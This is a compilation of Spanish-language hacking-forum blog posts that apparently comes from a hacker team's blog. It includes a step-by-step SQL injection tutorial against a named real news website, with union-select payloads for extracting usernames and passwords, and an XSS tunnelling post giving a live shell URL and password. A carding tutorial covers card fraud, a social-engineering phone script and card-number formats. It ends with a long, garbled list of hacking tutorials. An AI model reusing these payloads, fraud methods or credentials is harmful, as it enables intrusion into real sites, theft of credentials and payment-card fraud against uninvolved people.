Si los síntomas antes descritos aún persisten luego de haber examinado su ordenador, comprobado el hardware y software instalado y su disco duro utilizando las utilidades de Windows, usted debería enviar un mensaje con una descripción completa del problema al departamento de soporte técnico de su proveedor de antivirus, donde algunos programadores de antivirus analizarán los archivos infectados enviados por los usuarios.

Some antivirus software developers will analyse infected files submitted by users.
Una vez erradicada la infección

Verifique todos los discos y medios de almacenamiento removibles que pudieran estar infectados por el virus.p>

Asegúrese de que usted configuró de forma apropiada el software antivirus instalado en su ordenador.p>

Practique un uso seguro del ordenador


Fuente:http://zonehacking.ucoz.org/forum/13-241-1

Opera  

Posted by ShadinessDark in


Bueno aca les traigo el navegador opera =) 

sin dudas el mejor jeje

yo lo uso y no me trae tantos problemas como me traia

Mozilla Firefox

Este navegador viene mas completo =)

Saludos de parte de ShadinessDark =)

Bye

aca les dejo el link de descarga directa...

http://www.opera.com/download/get.pl?id=32024&location=288&nothanks=yes&sub=marine

XSS Tunnelling  

Posted by ShadinessDark in

Segun lo aque he leido se trata de crear un tunel logico (aprovechando un xss) entre la victima y el atacantes, con el fin de ejecutar comando que permitan realizar algunos procesos como Stealing etc.
para ello se usan XSS shells, bueno aqui dejo un par de documentos que explican mas a fondo.

Tutorial PDF Ingles + XSS Shells:
http://rapidshare.com/files/179578856/XSS_Tunnelling.zip

Video Tutorial XSS Tunnelling en Ingles:

http://www.portcullis-security.com/tools/free/xssshell-xsstunnell.zip

con estos mismos tutos 

v-getah 

dejo esta shell montada =) 

http://free.7host05.com/vgetah/admin/
el pass es:w00t

Fuente: http://foro.colombiaunderground.org/

Explicacion SQL INJECTION By: ShadinessDark Venezuela [R00t] Team  

Posted by ShadinessDark in




Buenas saludos a todo los users que visitan el blog  seguramente ya  me conocen algunos

Soy ShadinessDakr aca les traigo el tutorial SQL INJECTION YA MI BROTH ZERO BITS LO HIZO

PERO POR LO VISTO NO TODOS LO ENTENDIERON EN HACKXCRACK ME PIDIERON

EXPLICACION :)  BUENO ACA SE LAS DOY ... YA POR HAY LES TRAERE MAS TUTORIALES

POR HAY ME PONDRE EN CONTACTO CON UN MEN QUE ME DIJO PARA HACER UN 

VIDEO TUTORIAL DE SUBIR SHELL :D SALUDOS...

Primero que todo no pondre la estupidez que ponen en todo los tutoriales

que empieza este tutorial es con fines educativos -.- ni ellos mismo se la creen ...

Bueno are un ejemplo mas facil para que entiendan bien este tutorial!!! de mi brother Zero Bits

Primero que todo saludos a los hackxCrack
y principalmente a mi team Venezuela [R00t] Team
Je bueno vi que algunas personas no entendieron el tutorial de mi bro se los explicare

Primero que todo busquemos una victima

Yo la buscare alazar...
Vamos a google colocamos noticias.php?id= notas.php?id= videos.php?id= etc...


nos saldran varias paginas en mi caso les pondre una de ejemplo =)

Bueno despues que entren a una de ellas

en mi caso consegui esta
http://www.diariopuerto.com/noticias.php?id=

a lo ultimo para ver si es vulnerable ponemos el '
quedaria asi

http://www.diariopuerto.com/noticias.php?id='

Nos saldra el siguiente error si es vulnerable

si nos sale ese error quitamos el ' y agregamos lo siguiente: 

http://www.diariopuerto.com/noticias.php?id=-1+union+select+0,1,2,3,4,5,6,7,8,9

Asi hasta que nos tire los numeros en mi caso me tiro

les quedaria algo asi como en la imagen :D

a uds les podria tirar 1 2 3 4 5 6 7 etc... jejeje por hay es donde sacaremos el user! y la pass! 

Luego de esto vamos a lo ultimo y colocamos +from+usuarios
o usuario o email emails mails mail etc...

a mi me quedo asi http://www.diariopuerto.com/noticias.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+usuarios

Luego saquemos usuario y pass 

 http://www.diariopuerto.com/noticias.php?id=-1+union+select+usuario,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+usuarios
Se dan cuenta que cambie el 1 por usuario?
Bueno eso lo hago para que me tire el usuario luego se daran cuenta que les saldra el usuario =)

Para sacar la pass quitamos usuario y ponemos lo siguiente 
concat(usuario,0x3a3a,pass)

quedaria asi 

http://www.diariopuerto.com/noticias.php?id=-1+union+select+concat(usuario,0x3a3a,pass),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+usuarios

Si con pass no les agarra intenten con password o clave , contraseña , claves etc....

aca nos dara pass y user :D 

Bueno hay otra forma que es sacando la tabla pero es mas trabajo no?
ejejejejeejejejejejeejejejejejeeje 
bueno la tabla se ve como se saca en el tutorial de mi brother Zero Bits aunque si le sacas
el from no es necesario que saques las tablas =P
Espero haberme explicado bien cualquier cosa me avisan jejejejeje
este tutorial se los hago porque hay algunos que me han dicho que no entienden el de mi brother!!!

Saludos...
Especiales 
a mi team!!!! 
Venezuela [R00t] Team

Zero Bits
Geek Lord
Jeferx
TKDEAD
...........................................................
Otro saludo a los HackxCrack !!!! 


 

El arte de la introduccion  

Posted by ShadinessDark in


Bueno primero que todo saludos a los users ZoneHacking Por aca les traigo un 
libro demasiado bueno diria que todo mis votos son para el jaja ... 
lo empece a leer apenas y ya me parece demasiado bueno espero a uds les guste este libro 

lo consegui en HackxCrack por Neddih I creo que le quedo exelente su aporte  

Link de descarga: http://rapidshare.com/files....ar.html
Esto esta en español  

Pues espero les guste


Tutorial de Carding I By: Zero Bits Venezuela [R00t] Team  

Posted by ShadinessDark in

Bueno aca les dejo un tutorial que hizo mi broth hace mucho tiempo 

y es de el esta en varias partes entre ellas redwebs,undervenezuela,zonehacking,revolutionhack bueno bueno en muchos lados 
solo digo esto porque no quiero que medigan que le tuto es de otra persona 

salu2... 

Primero lo Primero: 

- Este POST tiene conceptos sacados y aprendidos de otras Personas... 
- Esto es para Aprender Algo nuevo... ¡ Por Favor se Razonable y no lo conviertes en una addcion! 
- Ten en cuenta que si cometes un error.. el minimo error.. Estaras en la Carcel y sin tarjeta de creditos para toda tu Vida.. 
__________________________________________________ __ 
UN TUTO HECHO POR MI.. AUNK NO CREO QUE SEA MEJOR QUE LOS DE DARK Y RU$$H 

Que es Carding? 

Bueno Carding es el Arte de Utilizar las Tarjetas de Creditos de otras personas, sin su permiso.. Es Parte del Hacking porque para conseguir los Datos se Necesita la Famosa y bella Tecnica de Ingienieria Social y algunos otros Metodos.. 

Pero que es Ingienieria Social? 

La Vieja y Mejor Tecnica del Hacking.. Consta en Engañar a una persona para conseguir datos importantes, secretos, y tambn para penetrar sistemas mas fuertes y dificiles... Con Tan solo Hablar y hacerse pasar por una Persona o Empresa de Confianza... 

Un pequeño ejemplo del Mejor Hacker del Mundo KEVIN MITNICK: 

Llamada 1 

- Recepcionista ®: XYZ Corp, buenos dias, ¿En que puedo ayudarle?. 

- Hacker (H): Hola, somos una agencia de Prensa y querriamos enviar una carpeta con Informacion corporativa a su director de Marketing, para que la evaluara ¿Podria decirme su Nombre y su direccion? 

- R: Si, Puede Enviarlas a Mark Ethin, a la direccion... 

- H: Por Casualidad no tendran ustedes a alguien mas de Marketing en otro sucrsal? 

- R: Si, Tambien esta Peter Webber en la sucursal... 

- H: ¿Y el numero de FAX de la central, para ponerlo en mi ficha de contactos? 

- R: El 212-555-1234 

- H: Gracias por la Informacion, me ah resultado de mucha ayuda. 

Llamada 2 

- R: Sucursal XYZ Corp, ¿Digame? 

- H: Hola, querria hablar con Peter Webber de Marketing, Te llamo desde la Oficina de Mark Ethin en la central. 

- R: Te Paso 

- Peter (P): Si, ¿digame? 

- H: Hola Peter, a ver si puedes ayudarme. Me llamo Hank soy nuevo en la empresa. Trbajo en Marketing con Mark Ethin en la oficina central desde hace unos dias. Mark esta fuera de la oficina y me ah encargado de conseguirle una copia impresa del ultimo Plan de Marketing. Pero al parecer hay algun problema con mi PC porque no han terminado de instarlo bien y no puedo acceder a la Entranet. He pensado que tal vez tu lo tengas. Corre un poco de prsa, la verdad, y ya sabes arreglar los PC tardan una barbaridad aqui. 

- P: Si, Bueno... Tengo la copia que nos envio el otro dia. 

- H: De Acuerdo, entonces ¿ Podrias mandarlo a la Central? No se si mi E-Mail funcionara... Lo mas Pratico seria que nos lo envies por FAX a recepcion, ya sabes, al 212-555-1234 

- P: De Acuerdo, al numero de siempre. 

- H: Recuerda ponerlo a mi Nombre, Hank Kerson. Yo se lo hare llegar a Mark. ¡Gracias! 

Llamada 3 

- R: XYZ Corp, Buenos dias ¿En que puedo ayudarle? 

- H: Hola, Me llamo Hank kerson, aver si puede echarme una o.. Trabajo en una Consultora Externa para el Plan de Marketing, y estamos Terminando un Proyecto con cierta Urgencia. Peter Webber de vuestra otra sucursal tenia que haberme enviado hace unas horas un FAX con cierte informacion, pero no ha llegado. He preguntado alli y al parecer alguien se equivoco de numero y lo han enviado al FAX de vuestra Oficina Principal, aunque el FAX esta a mi Nombre. 

- R: Si lo tengo por aqui, pone HANK KERSON, me extraño porque no trabaja nadie con ese nombre. 

- H: Ah, perfecto es el mio. Debe tener ciertas datos de Marketing ¿ Verdad? 

- R: Si, pone algo de PLAN DE MARKETING. 

- H: Ese es... Entnces ¿ No te importa enviarmelo al 212-555-9876? 

- R: No Hay problema, va para alla, lo tendra en 5 minutos 

- H: ¡Gracias! Enviare un correo a Peter. Para decirle que todo esta solucionado. 

Finalmente Hank, se dirige a la Copisteria mas cercana y recoge alli el FAX con el Plan de Marketing de la compañia XYZ. 

Que es un Carder? 

Es el que saca las Tarjetas de los diferentes metodos y la usa en paginas Cardeables.. 

Que es Phishin y Phisher? 

WIKIPEDIA: Phishing es un término informático que denomina un tipo de delito encuadrado dentro del ámbito de las estafas, y que se comete mediante el uso de un tipo de ingeniería social caracterizado por intentar adquirir información confidencial de forma fraudulenta (como puede ser una contraseña o información detallada sobre tarjetas de crédito u otra información bancaria). El estafador, conocido como phisher, se hace pasar por una persona o empresa de confianza en una aparente comunicación oficial electrónica, por lo común un correo electrónico, o algún sistema de mensajería instantánea o incluso utilizando también llamadas telefónicas. 

El término phishing proviene de la palabra pez en inglés en inglés "fishing" (pesca) haciendo alusión al acto de pescar usuarios mediante señuelos cada vez más sofisticados, y de este modo obtener información financiera y contraseñas. Quien lo practica es conocido con el nombre de phisher. También se dice que el término "phishing" es la contracción de "password harvesting fishing" (cosecha y pesca de contraseñas), aunque esto probablemente es un acrónimo retroactivo. 

Que es una Pagina Cardeable? 

Pagina donde se pueden comprar con Tarjeta de Credito facil y que no pidan tantos Datos... 

Bueno Empezemos ( Como son las Tarjetas de Credito) 

La Mayoria de las Tarjetas de Creditos se Forman por 16 Digitos... se Dividen en 4 Grupos... Pueden ser Digitos del numero 0 al 9.. y los Primeros cuatro sirven para determinar el Banco y tipo de Tarjeta... 

Tarjetas de Creditos: 

Si empieza con el Numero: 

Si la Trajeta empieza con el numero 3 es American Express y american tiene 15 Digitos 
4 - VISA - 16 Digitos y algunas veces 13 
5 - Mastercard - 16 Digitos 
6 - Discover (aun no lo conosco ) - 16 Digitos 

Abreviaturas: 

CC: Tarjeta de Credito 
Cvv: Las Tarjetas de Credito atras tienen ademas del numero de la Tarjeta 3 digitos que en la mayoria de las webs la usan como seguridad y tienes que poner esos 3 digitos.. pero Algunos no.. 
Fresh: Una Tarjeta de Credito que no ah sido usada 

Buenop... En la 2 part de la Guia vamos a tener: Sacar Tarjetas de Creditos, Como Comprar, conceptos y entre otras cosas.. 

Jajaja .. si tengo 5 comentarios buenos are el 2 part del TUTO.. 

Gracias...


mas de 1000mil tutoriales de hacking  

Posted by ShadinessDark in

Pues eso una recopilacion bastante interesante de 1000 (MIL) lol tutoriales de cosas relacionadas con Hacking, seguridad informaticas, como encontrar descargas (ilegales o legales) de software, mp3... y muchos "Com hacer..." How to... esas cosas! 

Incluye 
Crear arranque XP SP CD integrado, Crear un clic shutdown y reboot Shortcuts.txt CreaciÛn de una Junta alias Foro en su propia PC!. Rtf 
CreaciÛn Universal fantasma usb disco de arranque y Cd.txt 
Capacidad de datos de CDs [Tutorial]. Txt, depuraciÛn, Aprenda cÛmo ***** windows.txt, undeletable eliminar un fichero, Eliminar archivos de la reciente lista de archivos En Windows.txt, Digital Camera Guide.txt 
Faq-digital aprender· todo lo relacionado con Digital, captura, ediciÛn y Burning y more.txt 2,20 kB 
Digital Photo ID Cards, Greate Info.txt 2,88 kB 
Acceso directo a cualquier p·gina que desea en Hotmail.txt 1,95 kb 
DirectX Explained.txt 7,66 kB 
Desactivar compresiÛn El Xp, particiÛn NTFS, Disco Cleanup.txt 0,43 kB 
La desactivaciÛn de Enviar Informe de errores, a Microsoft.txt 0,51 kB 
Desactivar Windows Logo Key.txt 0,62 kB 
Descubre Nueva M?sica Probablemente usted Love.txt 1,08 kB 
Descarga gratuita de m?sica legal,, legally.txt 3,24 kB 
Descarga de un sitio de PayPal sin pagar un centavo!. Txt 0,95 kB 
Descarga de Ftpz, utilizando ftp b?squeda Sitez.txt 8,12 kb 
Descarga MP3 sin usar Filesharing.txt 0,69 kB 
Descargar m?sica y vÌdeo con, edia Player9, r·pido y f·cil!. Txt 0,66 kB 

Descargar Timeframes.txt 0,33 kB 
Dual se inicia despuÈs de la Fact.txt 1,37 kb 
Dvd-Copia de la rasgadura de Definitions.txt 1,25 kB 
Regiones DVD Information.txt 3,84 kB 
Dvd-9 a DVD + R DL, doble capa a doble capa, 1-1 copies.txt 0,94 kB 
- Desconecte f·cilmente volver a partir de Broadband.txt 0,30 kB 
Encontrar f·cilmente los n?meros de serie .. En Google, es f·cil de hacer y funciona como un encanto .. txt 1,40 kB 
Ebay Hack ***** tip.txt 0,50 kB 

mas..... leer la siguiente pagina 

Incluye los siguientes: 

Crear arranque XP SP CD integrado, Crear un clic shutdown y reboot Shortcuts.txt CreaciÛn de una Junta alias Foro en su propia PC!. Rtf 
CreaciÛn Universal fantasma usb disco de arranque y Cd.txt 
Capacidad de datos de CDs [Tutorial]. Txt, depuraciÛn, Aprenda cÛmo ***** windows.txt, undeletable eliminar un fichero, Eliminar archivos de la reciente lista de archivos En Windows.txt, Digital Camera Guide.txt 
Faq-digital aprender· todo lo relacionado con Digital, captura, ediciÛn y Burning y more.txt 2,20 kB 
Digital Photo ID Cards, Greate Info.txt 2,88 kB 
Acceso directo a cualquier p·gina que desea en Hotmail.txt 1,95 kb 
DirectX Explained.txt 7,66 kB 
Desactivar compresiÛn El Xp, particiÛn NTFS, Disco Cleanup.txt 0,43 kB 
La desactivaciÛn de Enviar Informe de errores, a Microsoft.txt 0,51 kB 
Desactivar Windows Logo Key.txt 0,62 kB 
Descubre Nueva M?sica Probablemente usted Love.txt 1,08 kB 
Descarga gratuita de m?sica legal,, legally.txt 3,24 kB 
Descarga de un sitio de PayPal sin pagar un centavo!. Txt 0,95 kB 
Descarga de Ftpz, utilizando ftp b?squeda Sitez.txt 8,12 kb 
Descarga MP3 sin usar Filesharing.txt 0,69 kB 
Descargar m?sica y vÌdeo con, edia Player9, r·pido y f·cil!. Txt 0,66 kB 

Descargar Timeframes.txt 0,33 kB 
Dual se inicia despuÈs de la Fact.txt 1,37 kb 
Dvd-Copia de la rasgadura de Definitions.txt 1,25 kB 
Regiones DVD Information.txt 3,84 kB 
Dvd-9 a DVD + R DL, doble capa a doble capa, 1-1 copies.txt 0,94 kB 
- Desconecte f·cilmente volver a partir de Broadband.txt 0,30 kB 
Encontrar f·cilmente los n?meros de serie .. En Google, es f·cil de hacer y funciona como un encanto .. txt 1,40 kB 
Ebay Hack ***** tip.txt 0,50 kB 
General Teclado Shortcuts.txt 7,54 kB 
PÛngase en Windows 2000 Como Administrator.txt 0,39 kB 
Obtenga m·s ventajas de su DVD Recorder.txt 11,25 kB 
Obtener la m?sica que desea Hear.txt 0,90 kb 
Obtener el ancho de banda ilimitado de su anfitriÛn para free.txt 2,88 kB 
Obtener un 1GB Yahoo China Account.txt 0,98 kB 
ObtenciÛn de Counter-Strike Source Para Work.txt 3,36 kB 
obtener pelÌculas, mp3, juegos utilizando google.txt 0,75 kB 
Conseguir mayores programas para funcionar en Windows XP.txt 2,96 kB 
Primeros pasos con Linux para nOObs!. Txt 17,37 kB 
Ir a actualizaciones de Windows anonymously.txt 0,40 kB 
Google ***** Search.txt 0,14 kB 
Google secrets.txt 0,98 kB 
Google Tips & Tricks, (utilizando los motores de b?squeda). Txt 5,81 kB 
Graffiti en las paredes 4 Adobe Photoshop Cs 8.0.txt 2,45 kB 
GuÌa para obtener libre Stuff.txt 10,33 kB 
GuÌa para IIS Exploitation.txt 27,77 kB 
GuÌa para la Slipstreaming Service Pack 2.txt 2,82 kB 
Disco duro Gone Bad.txt 5,55 kB 
Hardware Firewall.txt 3,02 kB 
øCÛmo aÒadir una opciÛn para imprimir, el contenido de una carpeta!. Txt 1,47 kB 
CÛmo agregar sus propias ventanas Tips.txt 0,48 kb 
CÛmo hacer copias de seguridad de la Registry.txt 0,76 kB 
øCÛmo realizar una copia de seguridad ps2 Games.txt 7,71 kb 
La forma de bloquear a las personas que comparten WinMx NOTHING.txt 1,51 kb 
øCÛmo bloquear Websties Sin Software, bloque websites.txt 0,64 kB 
CÛmo arrancar m·s r·pido Xp (actualizado). Txt 1,66 kB 
CÛmo construir un negro box.txt 7,79 kB 
la forma de "quemar" m·s r·pidamente a las ventanas xp.txt 0,28 kB 
CÛmo Bypass BIOS Passwords.txt 9,05 kB 
CÛmo eludir los filtros Web, tutorial.txt 6,20 kB 
CÛmo capturar streaming MEDIA.txt 1,68 kb 
øCÛmo cambiar un CMOS Battery.txt 3,18 kb 
øCÛmo cambiar el n?mero de serie utilizado en Windows XP, v·lido para XP Corporate.txt 1,11 kB 
øCÛmo cambiar el tamaÒo de las miniaturas y Quality.txt 0,90 kb 
CÛmo claro Bios info 2.txt 23,55 kB 
CÛmo claro Bios Info.txt 11,75 kB 
øCÛmo convertir sistema de archivos, grasa - fat32 para ntfs.txt 0,52 kB 
CÛmo copiar un DVD que va a desempeÒar en AX Box.txt 1,01 kb 
øCÛmo copiar las canciones de tu iPod a tu PC.txt 1,40 kB 
CÛmo personalizar su inicio Button.txt 1,54 kB 
øCÛmo borrar los desagradables persistentes Files.txt 0,53 kb 
CÛmo directamente a la bandeja de entrada, escribir mensajes, w Hotmail, sin necesidad de CÛmo encontrar MP3's real quickly.txt 0,35 kB 
CÛmo encontrar los n?meros de serie en Google.txt 0,79 kb 
CÛmo corregir archivos corruptos en XP.txt 1,48 kB 
CÛmo corregir Windows Installer problem.txt 0,96 kB 
øCÛmo conseguir una Libre I-pod Or TV de pantalla plana, verificar que out.txt 6,62 kB 
CÛmo obtener las ventanas PASSWORD.txt 3,41 kb 
CÛmo someones ISP contraseÒa, °gratis internet.txt 2,65 kB 
CÛmo llegar top ranking, b?squeda Engines.txt 6,58 kb 
CÛmo hackear Windows XP Admin Passwords.txt 2,52 kb 
CÛmo cortar el cambio de Windows XP arranque Screen.txt 1,52 kB 
CÛmo Ocultar tu red de usuarios! y le dar· acceso ?nicamente a usuarios especÌficos!. txt 0,86 kB 
CÛmo hacer un Animted Logo.txt 5,26 kb 
CÛmo hacer de telÈfono gratuito Calls.txt 2,29 kb 
øCÛmo se puede realizar clave generators.txt 8,83 kB 
CÛmo hacer las copias perfectas de Maxis Los Sims discos, CloneCD Estilo!. Txt 1,17 kB 
CÛmo hacer que XP ir Faster.txt 5,58 kb 
CÛmo hacer su propia estaciÛn de radio 2.txt 3,26 kB 
CÛmo hacer su propia emisora de radio Station.txt 1,58 kb 
CÛmo quitar la protecciÛn DRM de vÌdeo Files.txt 2,29 kB 
CÛmo eliminar ms JAVA e instalar Sun Java.txt 0,05 kb 
CÛmo eliminar Signin detalles de msn Passport.txt 1,04 kb 
CÛmo eliminar el administrador por defecto Shares.txt $ 1,03 kb 
CÛmo eliminar la carpeta Enlaces en IE Favorites.txt 0,59 kB 
CÛmo Eliminar WinXP Splash y ver Operations.txt 1,19 kB 
øPara cambiar el nombre de Extensiones con facilidad, con un archivo Renamer.bat!. Txt 0,44 kB 
øCÛmo es posible cambiar el nombre del archivo Extensions.txt 3,11 kB 
CÛmo cambiar el nombre de varios archivos en Winxp.txt 0,56 kb 
CÛmo restringir Usuario horas Allowed.txt 0,58 kb 
CÛmo proteger tus archivos cuando el ordenador crashes.txt 2,94 kB 
CÛmo ahorrar Windows xp updates.txt 0,63 kB 
cÛmo buscar en google para RAPIDSHARE links.txt 0,98 kB 
CÛmo ver archivos ocultos, utilizando Dos.txt 0,08 kb 
øCÛmo definir la b?squeda de todos los archivos en Winxp.txt 0,71 kb 
CÛmo crear un servidor http que a partir de computer.txt 3,06 kB 
CÛmo configurar un proxy en FlashGet, como Requested.txt 0,66 kb 
CÛmo configurar un servidor con Apache, PHP, MySQL, Perl, phpMyAdmin.txt 8,77 kB 
CÛmo montar la directa Connect.txt 26,96 kB 
CÛmo crear FTP SERVER.txt 1,79 kb 
øPara configurar proxies en su Browser.txt 1,63 kb 
øCÛmo establecer una zona de alarma ConfiguraciÛn!, Han solucionado los ZA ports.txt 2,12 kB 
øCÛmo configurar tu propio DNS (Domain Name Server). Txt 6,97 kB 
CÛmo acelerar un lento Computer.txt 1,21 kb 
øPara acelerar peticiones HTTP En Internet Explorer, como above.txt 1,28 kB 
øCÛmo parar Spam.txt 8,05 kB 
CÛmo jurar a todos languages.txt 28,32 kB 
CÛmo descargar archivos DLL en cachÈ a la libre Memory.txt 0,56 kb 
CÛmo usar y cÛmo la cadena de m?ltiples Proxies!. Txt 9,70 kB 
CÛmo usar la compresiÛn de archivos en Windows Xp.txt 4,19 kb 
CÛmo utilizar Google para la descarga de Mp3's, y aplicaciones ..... txt 0,60 kB 
CÛmo usar Newsgroups.txt 0,56 kB 
CÛmo utilizar Gmail con usted msn Messenger.txt 0,37 kb 
- øCÛmo Llegar vÌdeos y DVD en tu Sony PlayStation Portable (PSP) para free.txt 12,91 kB 
HOWTO cambio de Windows XP Home a Windows XP Pro.txt 1,67 kb 
Importante FAQs Sp2.txt 9,47 kB 
Doom 3 Mejorar la InterpretaciÛn o EjecuciÛn °, simple pero eficaz truco para every1.txt 4,22 kB 
Mejore su mÛdem preformance.txt 0,73 kB 
Aumento XP carpeta Settings.txt 0,79 kB 
Introduzca su n?mero de serial para Office 2k, auto instalar office.txt 1,06 kB 
Instalar un nuevo Hard-disk.txt 5,16 kB 
Instalar Xp De Dos.txt 0,84 kB 
InstalaciÛn de Apache en Windows.txt 6,29 kB 
InstalaciÛn de Gentoo Linux, Amazing paso a paso tutoria.txt 0,19 kB 
InstalaciÛn de IIS en Windows Xp Pro.txt 3,04 kb 
InstalaciÛn de Slackware Linux.txt 34,73 kB 
Instrucciones para la eliminaciÛn de la publicidad en msn Messenger.txt 2,59 kb 
DirecciÛn IP: Estructura, Expilinatin de direcciones IP (A) corto camino. Txt 7,65 kB 
Irc CÛmo descargue De, descargue CÛmo IRC.txt de 3,95 kB 
En servidores IRC nix, Para las personas que quieren empezar propio IRC net.txt 0,48 kB 
Mantenga Archivos Private.txt 1,51 kB 
Mantenga Carpetas Hidden.txt 0,46 kB 
MÈtodos abreviados de teclado de Resultados en Excel 2000 - Movement.txt 1,57 kB 
MÈtodos abreviados de teclado, Microsoft Word.txt 2,37 kB 
MÈtodos abreviados de teclado, debe read.txt 3,72 kB 
Microsoft Instant Kill Messenger.txt 0,28 kB 
Consejos de laminaciÛn, es una r·pida TUT txt ...... 1,98 kB 
Leet forma de llegar a su ip en Windows Xp.txt 0,26 kb 
Vincular tu Xbox a su Computer.txt 33,52 kB 
C”MO de Linux. Txt 0,08 kB 
Lista de sitios para no ir To.txt 4,32 kb 
PequeÒa ayuda para anÛnimo mailer.txt 1,56 kB 
Lotes de Windows XP Tips, echa un vistazo!. Txt 12,43 kB 
Letras Con Google.txt 0,08 kB 
Hacer un archivo autorun para Ur Cd.txt 0,66 kb 
Hacer un fichero por lotes Para limpiar UR PC!, Todo en uno!. Txt 1,37 kB 
Hacer una Aproximadamente 16 horas de vÌdeo Dvd.txt 1,01 kB 
Make Acrobat Reader 6 carga faster.txt 0,42 kB 
Haga Dvd De Iso Suse 9,2 5 Cds ISO, el modo Linux y Windows ISO modo creation.txt 7,41 kB 
Hacer archivos mp3 m·s pequeÒos sin perder Quality.txt 0,73 kb 
Make Your Own MÛvil para telÈfono mÛvil, logos, fondos de escritorio, etc.txt 3,00 kB 
Haga su PC m·s r·pido, Guaranteed.txt 6,23 kB 
MakeXPgoFaster.txt 5,74 kB 
hacer una. cue fichero, en notepad.txt 0,53 kB 
RealizaciÛn de una. Txt ejecutables Server.txt 1,60 kB 
Hacer que los disquetes de arranque para arrancar Windows.txt 4,82 kB 
Hacer cd versiÛn de Doom3 en dvd Version.txt 0,75 kb 
Hacer P·gina web Fuentes coherente y Uniform.txt 0,80 kB 
Administrar Guardado Es decir, Passwords.txt 0,75 kB 
Dominar el Windows XP Registry.txt 5,79 kb 
Maximizar el mÛdem de acceso telefÛnico Settings.txt 2,31 kB 
Microsoft's Really ficheros ocultos, indicÛ Hidden files.txt 33,95 kB 
mIRC no sÛlo otro cliente de chat, descargar todo lo que quieras Almost.txt 4,37 kb 
mIRCcommands.txt 10,10 kB 
Varios Linux Tips & Tricks.txt 18,55 kB 
Falta el Administrador Account.txt 0,52 kB 
Mobile Secret Codes.txt 31,09 kB 
Modificar. Exe Y ***** A Program.txt 3,06 kB 
M·s Hacking / Una guÌa para principiantes Hacking UNIX.txt 5,61 kB 
M·s Hacking / A ***** ciÛn Tutorial/C101-90.000 3,85 kB 
M·s Hacking / A ***** ciÛn Tutorial/C101-90.001 32,32 kB 
M·s Hacking / A ***** ciÛn Tutorial/C101-90.002 30,93 kB 
M·s Hacking / A ***** ciÛn Tutorial/C101-90.003 14,75 kB 
M·s Hacking / A ***** ciÛn Tutorial/C101-90.004 54,91 kB 
M·s Hacking / A ***** ciÛn Tutorial / ED! SON.NFO 1,58 kB 
M·s Hacking / A Guide to Internet Security-Convertirse en un Ueber ***** er.txt 8,56 kB 
M·s Hacking / GuÌa para la m·s f·cil Hacking existe is.txt 4,58 kB 
M·s Hacking / Una lista de algunos de los m·s ?tiles UNIX Hacking Commands.htm 23,03 kB 
M·s Hacking / Una pequeÒa guÌa de Hacking HOTMAIL.txt 3,02 kB 
M·s Hacking / A UNIX Hacking Tutorial.txt 82,20 kB 
M·s Hacking / Casi todo lo que siempre quiso saber sobre seguridad (47,52 kB but.txt 
M·s Hacking / Un Indepth GuÌa de Hacking en UNIX y el concepto b·sico de Net.txt 40,84 kB 
M·s Hacking / IntroducciÛn a la denegaciÛn de Service.txt 44,78 kB 
M·s Hacking / IntroducciÛn a la ComputaciÛn Underground.txt 17,03 kB 
M·s Hacking / Basic Networking.txt 14,04 kB 
M·s Hacking / BBS estrellarse Techniques.txt 3,72 kB 
M·s Hacking/BRUTE- Un enfoque de fuerza bruta a intrusiones de piratas inform·ticos Unix passwords.txt 3,31 kB 
M·s Hacking / Cierre de las Net.txt 30,69 kB 
M·s Hacking / CompresiÛn y ***** s para Dummies.txt 52,75 kB 
M·s Hacking / Computer Bulliten Juntas y el Law.txt 56,06 kB 
M·s Hacking / Computer Chrime - Pr·cticas Actuales, Problemas y Propuestas So.txt 96,53 kB 
M·s Hacking / Computer direcciÛn de correo electrÛnico y Privacy.txt 19,18 kB 
M·s Hacking / Computer Hackers Noticias Articles.txt 5,89 kB 
M·s Hacking / Computer vs Derechos Primera y Cuarta Amentment Right.txt 44,24 kB 
M·s Hacking / Computer Security.txt 63,52 kB 
M·s Hacking / Computer Security_2.txt 51,94 kB 
M·s Hacking / Computer Viruii.txt 19,98 kB 
M·s Hacking / computarizado gubernamentales sistemas de bases de datos que contiene Persona.txt 40,34 kB 
M·s Hacking / COPS y ladrones de Unix System Security.txt 35,18 kB 
M·s Hacking / Copyright GuÌas para Photographers.txt 17,02 kB 
M·s Hacking / Curso acelerado de X Windows Security.txt 12,45 kB 
M·s Hacking / Delito y Puzzlement.txt 62,34 kB 
M·s Hacking / en las formaciones culturales basados en texto Virtual Realties.txt 257,27 kB 
M·s Hacking / Hacking TRW.txt 2,58 kB 
M·s Hacking / Hacking TYMNET.txt 5,79 kB 
M·s Hacking / Hacking Unix System V's. Txt 10,93 kB 
M·s Hacking / Hacking Wal-Mart Computers.txt 4.09 kB 
M·s Hacking / Hacking Webpages.txt 3,90 kB 
M·s Hacking / øCÛmo los medios de comunicaciÛn tradicionales Clasifications no protegen a t.txt 40,50 kB 
M·s Hacking / CÛmo accidente AOL.txt 4,75 kB 
M·s Hacking / CÛmo marcar de un UNIX System.txt 3,49 kB 
M·s Hacking / CÛmo encontrar Seguridad Holes.txt 15,99 kB 
M·s Hacking / CÛmo obtener una Shell a 24 hours.txt 7,98 kB 
M·s Hacking / Hack CÛmo UNIX System V.txt 10,93 kB 
M·s Hacking / øCÛmo acceder a una C.B.I. System.txt 3,00 kB 
M·s Hacking / øCÛmo enviar ICQ Bombs.txt 2,33 kB 
M·s Hacking / InformaciÛn de Hacking AngelFire Websites.txt 3,21 kB 
M·s Hacking / IntroducciÛn a Denail de Service.txt 44,78 kB 
M·s Hacking / direccionamiento IP, y la obtenciÛn de la propiedad intelectual. Txt 13,70 kB 
M·s Hacking / IP Addressing.txt 13,70 kB 
M·s Hacking / ISSN N?meros-Un Introduction.txt 5,96 kB 
M·s Hacking / correo basura-øCÛmo obtengo mi todos Address.txt 12,70 kB 
M·s Hacking / LENROS ~ 1.TXT 184,58 kB 
M·s Hacking / LENROS ~ 2.TXT 7,41 kB 
M·s Hacking / MEMETICS.TXT 45,79 kB 
M·s Hacking / MINDVOX.TXT 64,57 kB 
M·s Hacking / MORRIS ~ 1.TXT 31,18 kB 
M·s Hacking / NEIDOR ~ 1.TXT 41,02 kB 
M·s Hacking / NFS Tracing.txt 34,20 kB 
M·s Hacking/Nightline- FBI, privacidad, y Proyecto de escuchas telefÛnicas Legislation.txt 20,86 kB 
